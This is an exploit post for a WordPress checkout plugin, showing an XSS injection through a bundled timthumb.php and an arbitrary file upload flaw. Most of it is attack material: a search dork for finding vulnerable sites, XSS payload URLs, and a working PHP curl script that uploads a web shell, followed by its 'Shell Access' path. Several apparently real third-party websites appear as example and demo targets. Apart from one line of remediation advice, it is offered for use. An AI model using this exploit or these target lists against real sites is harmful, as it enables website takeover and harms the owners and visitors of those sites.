#Title : Wordpress Plugin wp-checkout XSS / Arbitrary File Upload #Author : DevilScreaM #Date : 10/31/2013 #Category : Web Applications #Type : PHP #Greetz : 0day-id.com | newbie-security.or.id | Borneo Security | Indonesian Security Indonesian Hacker | Indonesian Exploiter | Indonesian Cyber #Thanks : ShadoWNamE | gruberr0r | Win32Conficker | Rec0ded | #Vulnerabillity : xss, Arbitrary File Upload #Dork : inurl:wp-content/plugins/wp-checkout Cross Site Scripting http://site-target/wp-content/plugins/wp-checkout/vendors/timthumb.php?src=[XSS] Example http://osteopathywinchester.co.uk/wp-content/plugins/wp-checkout/vendors/timthumb.php?src=<h1>DevilScreaM</h1> http://pacificcrest.org/wp-content/plugins/wp-checkout/vendors/timthumb.php?src=<h1>DevilScreaM</h1> Solution Upgrade Version Timthumb or Delete Files timthumb.php ================================================================================================= Arbitrary File Upload Exploit : http://site-target/wp-content/plugins/wp-checkout/vendors/ajaxupload/upload.php <?php $uploadfile="devilscream.php"; $ch = curl_init("http://site-target/wp-content/plugins/wp-checkout/vendors/ajaxupload/upload.php"); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, array('Filedata'=>"@$uploadfile", 'folder'=>'/wp-content/uploads/wp-checkout/')); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $postResult = curl_exec($ch); curl_close($ch); print "$postResult"; ?> Shell Access : http://site-target/wp-content/uploads/wp-checkout/devilscream.php Demo : http://prittybypri.com/wp-content/plugins/wp-checkout/vendors/ajaxupload/upload.php http://windham73.com/wp-content/plugins/wp-checkout/vendors/ajaxupload/upload.php http://twobuttons.com/wp-content/plugins/wp-checkout/vendors/ajaxupload/upload.php http://riosdeaguavivaupci.com/hp_wordpress/wp-content/plugins/wp-checkout/vendors/ajaxupload/upload.php http://brookesprevention.org/wp-content/plugins/wp-checkout/vendors/ajaxupload/upload.php http://theheartofawoman.net/wp-content/plugins/wp-checkout/vendors/ajaxupload/upload.php